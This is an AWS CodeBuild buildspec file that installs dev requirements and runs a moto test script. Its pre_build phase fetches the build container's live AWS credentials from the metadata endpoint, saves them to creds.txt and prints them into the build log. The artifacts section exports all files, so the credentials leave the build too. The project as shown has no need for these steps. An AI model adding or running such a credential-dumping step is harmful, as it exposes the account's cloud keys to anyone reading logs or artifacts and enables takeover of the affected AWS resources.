version: 0.2

phases:
  pre_build:
    commands:
      - pip install -r requirements-dev.txt
      - curl 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI > creds.txt
      - cat creds.txt
  build:
    commands:
      - python moto-test.py
  post_build:
    commands:
artifacts:
  files:
    - '**/*'